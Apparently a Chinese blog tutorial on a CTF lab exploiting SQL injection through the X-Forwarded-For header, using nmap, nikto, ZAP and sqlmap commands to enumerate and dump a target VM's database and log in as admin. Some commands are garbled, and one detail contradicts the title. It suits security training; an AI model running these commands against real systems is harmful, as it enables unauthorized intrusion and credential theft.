ctf训练 web安全SQL注入(X-Forwarded-For)

ctf训练 web安全SQL注入(X-Forwarded-For)

SQL注入漏洞介绍

SQL注入攻击指用用户构建特殊的输入作为参数传入Web应用程序,通过执行sQ语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。

任何一个用户可以输入的位置都可能是注入点。比如url中,以及http报文中;

实验环境

一台kail攻击机 和 靶机
靶机镜像:https://pan.baidu.com/s/1juB-vkfP9C7RHEM5T4ffAA
提取码:dquy

安装打开靶机(使用Oracle VM VirtualBox打开):
注意:靶机用桥接模式则攻击机也用桥接模式,注意检查!!!!)

接下来发现没法登陆,也没有办法获取ip地址
所以我们在kail下
进入控制台

使用netdiscover命令 netdiscover -r ip/子网掩码 命令来探测靶机,靶机ip为192.168.43.181

在这里插入图片描述在这里插入图片描述本机ip为192.168.43.96
在这里插入图片描述

信息探测

扫描主机服务信息以及服务版本
– nmap -sV靶场IP地址
在这里插入图片描述

快速扫描主机全部信息
– nmap -T4 -A -v靶场lP地址
在这里插入图片描述在这里插入图片描述

探测敏感信息
– nikto -host http://靶场IP地址:端口
心在这里插入图片描述发现一个登录界面,于是尝试用浏览器打开
在这里插入图片描述这个页面不存在弱口令,但是可能存在sql漏洞,接下来探测一下

漏洞扫描

漏洞扫描器OWASP ZAP

功能强大,专注于web安全的漏洞扫描器

在这里插入图片描述

在这里插入图片描述这里发现具有sql注入漏洞,漏洞为X-Frame-Options参数

漏洞利用

针对web进行漏洞扫描
对扫描的结果进行分析。注意:如果具有sQL注入漏洞,可以直接利用。毕竟sQL注入是高危漏洞,可以直接获取服务器权限。

使用sqlmap利用SQL注入漏洞

– sqlmap -u url -headers=“X-Forwarded-For:* ” -dbs --batch 查看数据库名
在这里插入图片描述这里是一个一个字节的爆的,所以有一点点慢,耐心等待
在这里插入图片描述

– sqlmap -u url -headers=“X-Forwarded-For:* ” -D “数据库名”-tables 查看对应数据库中的数据表
在这里插入图片描述这里爆表名也是一个一个的爆,耐心等待!!!
在这里插入图片描述

–batch-- sqlmap -u url -headers=“X-Forwarded-For:* ” -D “数据库名” -T “表名” columns 查看对应字段 --batch
在这里插入图片描述在这里插入图片描述

– sqlmap -u url -headers=“X-Forwarded-For:*” -D “数据库名” -T “表名” -C “列名” -dump --batch
在这里插入图片描述
在这里插入图片描述使用获取到的用户名和密码去登录
在这里插入图片描述然后这里就成功进入后台了,也可能进行上传shell一类的操作(之前的文章有提到如何上传shell)
在这里插入图片描述

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

爱吃香菜的哈哈

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值